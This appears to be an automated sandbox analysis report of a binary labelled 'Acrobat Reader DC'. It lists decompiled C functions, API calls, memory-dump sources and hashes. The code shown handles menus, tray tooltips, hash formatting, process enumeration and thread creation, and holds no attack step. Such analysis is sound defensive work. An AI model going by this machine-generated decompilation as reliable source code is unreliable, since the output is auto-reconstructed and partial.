                                  0x00440e4e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440e4e
                                  0x00440e18
                                  0x00440e50
                                  0x00440e50
                                  0x00440e51
                                  0x00440e55
                                  0x00440e58
                                  0x00440e58
                                  0x00440e6e
                                  0x00440e74
                                  0x00440e75
                                  0x00440e58
                                  0x00440e7e
                                  0x00440ea6
                                  0x00440eb5
                                  0x00440ec1
                                  0x00000000
                                  0x00440ed0
                                  0x00440e80
                                  0x00440ea3
                                  0x00440ed9
                                  0x00440ed9
                                  0x00440ed9

                                  APIs
                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                  • SendMessageW.USER32(00A71980,000000F1,00000000,00000000), ref: 00440E6E
                                  • SendMessageW.USER32(00A71980,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow
                                  • String ID:
                                  • API String ID: 312131281-0
                                  • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                  • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448480(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, short* _a20, int _a24, intOrPtr _a28) {
				struct tagMENUITEMINFOW _v56;
				signed int _t48;
				short* _t51;
				struct HWND__** _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				int _t75;
				int _t76;
				signed int _t77;

				_t58 = _a4;
				_t77 = _a8;
				_t75 = _a16;
				_v56.cbSize = 0x30;
				E00412F40( &(_v56.fMask), 0, 0x2c);
				if(_t75 != 0xffffffff) {
					if(E00441AF5(0x4a8630, _t75,  &_a16,  &_a8) == 0) {
						goto L16;
					} else {
						_t68 =  *0x4a8690; // 0x0
						_t58 =  *( *(_t68 + _a16 * 4));
						if(_t58[0x6a] == 0) {
							goto L16;
						} else {
							_t48 = _a8;
							_t60 =  *0x4a86a4; // 0xa71980
							 *(_t77 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t60 + _t48 * 4)))) + 8);
							_t62 =  *0x4a86a4; // 0xa71980
							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t48 * 4)))) + 0x88)) != 0xe) {
								L8:
								if(IsMenu( *(_t77 + 8)) == 0) {
									goto L16;
								} else {
									goto L9;
								}
							} else {
								_v56.fMask = 4;
								if(GetMenuItemInfoW( *(_t77 + 8), _t75, 0,  &_v56) == 0) {
									goto L16;
								} else {
									 *(_t77 + 8) = _v56.hSubMenu;
									goto L8;
								}
							}
						}
					}
				} else {
					if(_t58[0x6a] == 0) {
						L16:
						return 0;
					} else {
						 *(_t77 + 8) = _t58[0x68];
						L9:
						_v56.fMask = 0x13;
						_v56.fType = 0;
						if(_a28 == 1) {
							_v56.fType = 0x200;
						}
						_t51 = _a20;
						if( *_t51 == 0) {
							_v56.fType = 0x800;
						} else {
							_v56.dwTypeData = _t51;
						}
						_t76 = _a24;
						_v56.wID = _a12;
						if(InsertMenuItemW( *(_t77 + 8), _t76, 1,  &_v56) == 0) {
							goto L16;
						} else {
							 *(_t77 + 0x80) = _t76;
							DrawMenuBar( *_t58);
							return 1;
						}
					}
				}
			}













                                  0x00448487
                                  0x0044848b
                                  0x0044848f
                                  0x0044849a
                                  0x004484a1
                                  0x004484ac
                                  0x004484de
                                  0x00000000
                                  0x004484e4
                                  0x004484e7
                                  0x004484f0
                                  0x004484f9
                                  0x00000000
                                  0x004484ff
                                  0x004484ff
                                  0x00448502
                                  0x00448510
                                  0x00448513
                                  0x00448525
                                  0x00448549
                                  0x00448555
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448527
                                  0x00448532
                                  0x00448541
                                  0x00000000
                                  0x00448543
                                  0x00448546
                                  0x00000000
                                  0x00448546
                                  0x00448541
                                  0x00448525
                                  0x004484f9
                                  0x004484ae
                                  0x004484b5
                                  0x004485c2
                                  0x004485c8
                                  0x004484bb
                                  0x004484c1
                                  0x00448557
                                  0x0044855b
                                  0x00448562
                                  0x00448569
                                  0x0044856b
                                  0x0044856b
                                  0x00448572
                                  0x00448579
                                  0x00448580
                                  0x0044857b
                                  0x0044857b
                                  0x0044857b
                                  0x00448587
                                  0x00448598
                                  0x004485a3
                                  0x00000000
                                  0x004485a5
                                  0x004485a5
                                  0x004485af
                                  0x004485bd
                                  0x004485bd
                                  0x004485a3
                                  0x004484b5

                                  APIs
                                  • _memset.LIBCMT ref: 004484A1
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32 ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                  • String ID: 0
                                  • API String ID: 3866635326-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00401B80(void* __eax, void* __fp0) {
				struct _NOTIFYICONDATAW _v940;
				short _v942;
				short _v1196;
				char _v1212;
				char _v1220;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t32;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				void* _t78;

				_t78 = __fp0;
				_t23 = __eax;
				_t72 =  *0x4974ea;
				_push(_t57);
				if( *0x4974ea != 0) {
					_t64 = __eax;
					_t49 =  &_v1212;
					E004013C0(0x104,  &_v1212, _t72);
					if( *0x4974ec == 1) {
						_t49 =  *0x497520;
						LoadStringW( *0x497520, 0x65,  &_v1196, 0x7f);
					} else {
						_v1196 = 0;
					}
					E00402160( &_v1212,  &_v1196, 0, _t57);
					if( *0x4974e9 != 0) {
						_t59 =  *0x4a7f50; // 0x8dface
						E0040D200( &_v1212, _t49, _t59, _t78);
						_t65 =  *0x4a826c; // 0x9
						_t32 = E004348DE(_t65);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L7;
						} else {
							E0040D200( &_v1212, _t49, L"\nLine: ", _t78);
							_t61 = E004348DE(_t65);
							goto L6;
						}
						L13:
					} else {
						if( *((intOrPtr*)(_t64 + 0x60)) != 0) {
							E0040E0A0( &_v1212, _t64 + 0x5c);
						} else {
							_t61 =  *0x4a7f50; // 0x8dface
							L6:
							E0040D200( &_v1212, _t49, _t61, _t78);
						}
					}
					L7:
					E00412F40( &(_v940.hWnd), 0, 0x3a4);
					_v940.cbSize = 0x3a8;
					_v940.hWnd =  *0x497518;
					_v940.uID = 1;
					_v940.uFlags = 4;
					E00412FBA( &_v1196, _v1212, 0x7f);
					_v942 = 0;
					E00411567( &(_v940.szTip),  &_v1196);
					Shell_NotifyIconW(1,  &_v940);
					_t23 = E00402250( &_v1220);
				}
				return _t23;
				goto L13;
			}


















                                  0x00401b80
                                  0x00401b80
                                  0x00401b8c
                                  0x00401b95
                                  0x00401b96
                                  0x00401b9c
                                  0x00401ba3
                                  0x00401ba7
                                  0x00401bb3
                                  0x0042722b
                                  0x0042723b
                                  0x00401bb9
                                  0x00401bbb
                                  0x00401bbb
                                  0x00401bc8
                                  0x00401bd4
                                  0x00427258
                                  0x00427262
                                  0x00427267
                                  0x0042726e
                                  0x00427273
                                  0x00427275
                                  0x00000000
                                  0x0042727b
                                  0x00427284
                                  0x0042728f
                                  0x00000000
                                  0x0042728f
                                  0x00000000
                                  0x00401bda
                                  0x00401bde
                                  0x0042724e
                                  0x00401be4
                                  0x00401be4
                                  0x00401bea
                                  0x00401bee
                                  0x00401bee
                                  0x00401bde
                                  0x00401bf3
                                  0x00401c02
                                  0x00401c19
                                  0x00401c24
                                  0x00401c2b
                                  0x00401c36
                                  0x00401c41
                                  0x00401c55
                                  0x00401c5d
                                  0x00401c6f
                                  0x00401c79
                                  0x00401c79
                                  0x00401c84
                                  0x00000000

                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _memset.LIBCMT ref: 00401C02
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1756504749-1585850449
                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040F850(void* __eax, void* __ecx, void* __eflags) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t15;
				void* _t18;
				void* _t31;
				void* _t32;
				void* _t34;
				unsigned int* _t35;
				void* _t49;
				void* _t50;
				void* _t52;
				void* _t53;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_t38 = __ecx;
				_t50 = __eax;
				_t56 = __ecx;
				_t11 = E00413530(__eax);
				_t65 = _t64 + 4;
				E0040F820(_t56);
				E0040F880(_t11, _t38, _t56, _t50);
				_t52 = _t49;
				_t15 = _t56;
				_t57 = _t55;
				_t34 = _t32;
				_t66 = _t65 - 0xc;
				_push(_t34);
				_push(_t57);
				_push(_t52);
				_t53 = _t15;
				_t35 = _t53 + 0x44;
				E0040F9D0(_t35,  &_v16, 8);
				_t42 =  *_t35 >> 0x00000003 & 0x0000003f;
				if(( *_t35 >> 0x00000003 & 0x0000003f) >= 0x38) {
					_t18 = 0x78;
				} else {
					_t18 = 0x38;
				}
				E0040F880(_t18 - _t42, _t42, _t53, 0x4921a8);
				E0040F880(8, _t42, _t53,  &_v16);
				E0040F9D0(_t53 + 0x34, _t53, 0x10);
				E00412F40(_t35, 0, 8);
				E00412F40(_t53 + 0x34, 0, 0x10);
				E00412F40(_t53 + 0x4c, 0, 0x40);
				_t36 = _t53 + 0x10;
				_t67 = _t66 + 0x24;
				 *((char*)(_t53 + 0x10)) = 0;
				_t59 = 0;
				do {
					E00414DB8( *(_t59 + _t53) & 0x000000ff,  &_v8, "%02X",  *(_t59 + _t53) & 0x000000ff);
					_t31 = E00413660(_t36,  &_v8);
					_t59 = _t59 + 1;
					_t67 = _t67 + 0x14;
				} while (_t59 < 0x10);
				return _t31;
			}


























                                  0x0040f850
                                  0x0040f853
                                  0x0040f856
                                  0x0040f858
                                  0x0040f85d
                                  0x0040f862
                                  0x0040f86c
                                  0x0040f871
                                  0x0040f872
                                  0x0040f874
                                  0x0040f875
                                  0x0040f913
                                  0x0040f916
                                  0x0040f917
                                  0x0040f918
                                  0x0040f919
                                  0x0040f91b
                                  0x0040f928
                                  0x0040f932
                                  0x0040f938
                                  0x00426b3b
                                  0x0040f93e
                                  0x0040f93e
                                  0x0040f93e
                                  0x0040f94a
                                  0x0040f958
                                  0x0040f969
                                  0x0040f973
                                  0x0040f97d
                                  0x0040f98a
                                  0x0040f98f
                                  0x0040f992
                                  0x0040f995
                                  0x0040f998
                                  0x0040f9a0
                                  0x0040f9ae
                                  0x0040f9b8
                                  0x0040f9bd
                                  0x0040f9be
                                  0x0040f9c1
                                  0x0040f9cc

                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F820: _memset.LIBCMT ref: 0040F828
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _memset.LIBCMT ref: 0040F973
                                  • _memset.LIBCMT ref: 0040F97D
                                  • _memset.LIBCMT ref: 0040F98A
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$_memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1823384282-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433EE0 Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00433EE0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
				char _v12;
				char _v532;
				intOrPtr _v560;
				void* _v568;
				char _v1084;
				char _v1600;
				char _v2116;
				void* __edi;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t34;
				void* _t45;
				char* _t46;
				void* _t47;
				void* _t48;

				_t46 = _a12;
				_v568 = 0x22c;
				_t45 = CreateToolhelp32Snapshot(2, 0);
				_push( &_v568);
				Process32FirstW(_t45);
				 *_t46 = 0;
				_t22 = E00433D5F(_a4, _a4);
				_t48 = _t47 + 4;
				_t34 = _t22;
				if( *_t46 == 0) {
					while(Process32NextW(_t45,  &_v568) == 1) {
						E00413A0E( &_v532,  &_v12,  &_v2116,  &_v1084,  &_v1600);
						E00411536( &_v1084,  &_v1600);
						_t31 = E004114AB(_t45,  &_v1084, _a4);
						_t48 = _t48 + 0x24;
						if(_t31 != 0) {
							if(_t34 != 0) {
								_t32 = _v560;
								if(_t34 == _t32) {
									 *_a8 = _t32;
									goto L8;
								}
							}
						} else {
							 *_a8 = _v560;
							L8:
							 *_t46 = 1;
						}
						if( *_t46 == 0) {
							continue;
						}
						goto L10;
					}
				}
				L10:
				CloseHandle(_t45);
				return 1;
			}



















                                  0x00433eeb
                                  0x00433ef3
                                  0x00433f03
                                  0x00433f0b
                                  0x00433f0d
                                  0x00433f17
                                  0x00433f1a
                                  0x00433f1f
                                  0x00433f25
                                  0x00433f27
                                  0x00433f30
                                  0x00433f63
                                  0x00433f76
                                  0x00433f86
                                  0x00433f8b
                                  0x00433f90
                                  0x00433fa1
                                  0x00433fa3
                                  0x00433fab
                                  0x00433fb0
                                  0x00000000
                                  0x00433fb0
                                  0x00433fab
                                  0x00433f92
                                  0x00433f9b
                                  0x00433fb2
                                  0x00433fb2
                                  0x00433fb2
                                  0x00433fb8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433fb8
                                  0x00433f30
                                  0x00433fbe
                                  0x00433fbf
                                  0x00433fcd

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00433EFD
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                  • __wsplitpath.LIBCMT ref: 00433F63
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00433F76
                                  • __wcsicoll.LIBCMT ref: 00433F86
                                  • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                  • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0041F6F9(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t6;
				long _t7;
				intOrPtr* _t8;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t6 = HeapReAlloc( *0x496e6c, 0, _a4, _t30);
							_t27 = _t6;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t7 = _t27;
							} else {
								__eflags =  *0x496e68 - _t6;
								if(__eflags == 0) {
									_t8 = E00417F77(__eflags);
									 *_t8 = E00417F35(GetLastError());
									goto L17;
								} else {
									__eflags = E00411988(_t30);
									if(__eflags == 0) {
										_t12 = E00417F77(__eflags);
										 *_t12 = E00417F35(GetLastError());
										L12:
										_t7 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00411988(_t30);
						 *((intOrPtr*)(E00417F77(__eflags))) = 0xc;
						goto L12;
					} else {
						E00413748(_a4);
						_t7 = 0;
					}
					L14:
					return _t7;
				} else {
					return E004135BB(__edx, __edi, __esi, _a8);
				}
			}









                                  0x0041f702
                                  0x0041f70f
                                  0x0041f710
                                  0x0041f713
                                  0x0041f715
                                  0x0041f724
                                  0x0041f757
                                  0x0041f757
                                  0x0041f75a
                                  0x00000000
                                  0x00000000
                                  0x0041f727
                                  0x0041f729
                                  0x0041f72b
                                  0x0041f72b
                                  0x0041f72b
                                  0x0041f738
                                  0x0041f73e
                                  0x0041f740
                                  0x0041f742
                                  0x0041f7a2
                                  0x0041f7a2
                                  0x0041f744
                                  0x0041f744
                                  0x0041f74a
                                  0x0041f78c
                                  0x0041f7a0
                                  0x00000000
                                  0x0041f74c
                                  0x0041f753
                                  0x0041f755
                                  0x0041f774
                                  0x0041f788
                                  0x0041f76e
                                  0x0041f76e
                                  0x0041f76e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041f755
                                  0x0041f74a
                                  0x00000000
                                  0x0041f770
                                  0x0041f75d
                                  0x0041f768
                                  0x00000000
                                  0x0041f717
                                  0x0041f71a
                                  0x0041f720
                                  0x0041f720
                                  0x0041f771
                                  0x0041f773
                                  0x0041f704
                                  0x0041f70e
                                  0x0041f70e

                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  • API String ID: 1020059152-632041663
                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00436C6E(void** _a4, intOrPtr* _a8, void** _a12) {
				void* _t7;
				void* _t11;
				void* _t23;

				_t23 = E00436B19();
				_t7 = GetCurrentProcess();
				DuplicateHandle(GetCurrentProcess(),  *_a4, _t7, _t23, 0, 0, 2);
				_t2 = _t23 + 8; // 0x8
				_t11 = GetCurrentProcess();
				DuplicateHandle(GetCurrentProcess(),  *_a12, _t11, _t2, 0, 0, 2);
				 *((intOrPtr*)(_t23 + 4)) =  *_a8;
				return CreateThread(0, 0, E00436C2B, _t23, 0, 0);
			}






                                  0x00436c83
                                  0x00436c88
                                  0x00436c9a
                                  0x00436ca2
                                  0x00436ca6
                                  0x00436cb2
                                  0x00436cc7
                                  0x00436cd4

                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32 ref: 00436CCA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
